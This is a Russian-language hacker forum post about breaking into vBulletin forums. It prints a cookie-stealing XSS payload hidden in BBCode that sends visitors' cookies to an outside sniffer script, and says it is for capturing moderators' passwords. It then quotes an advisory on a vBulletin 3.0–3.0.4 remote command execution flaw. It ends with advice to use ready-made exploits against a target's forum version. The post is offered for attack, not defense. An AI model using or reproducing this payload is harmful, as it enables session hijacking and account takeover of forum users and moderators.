А ты как думал???...
Конечно есть(смотря для какой версии)
Вот тебе для 3.х(и всех остальных ): mailto:assss@wew.ew ]
sssssss[/URL]` style=`background:url(javaSCript:document.images[68].src="htt"+"p"+":"+"/"+"/"+"sniffSite/sniff.cgi?"+document.cookie)`
Вот так можно подснифать пассы модеров.
Выполнение произвольных команд в vBulletin Программа: vBulletin 3.0 - 3.0.4
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость в vBulletin позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.
Уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
искать только эксплоиты, только они.
ставить на хост, версию, которая интересна для хека, для ручного анализа уйдет много времени, сил, ума, и есть факт, что 90% вы ничего не найдете.
Сканеры не помогут на таком проекте, так же я уже говорил, и подчеркну еще раз, что любая cms, блог, форум, искать баги на sql xss rfi lfi бесполезно.
Полезно, заюзать сплоит, под ту или иную версию булки. Все придумано за нас.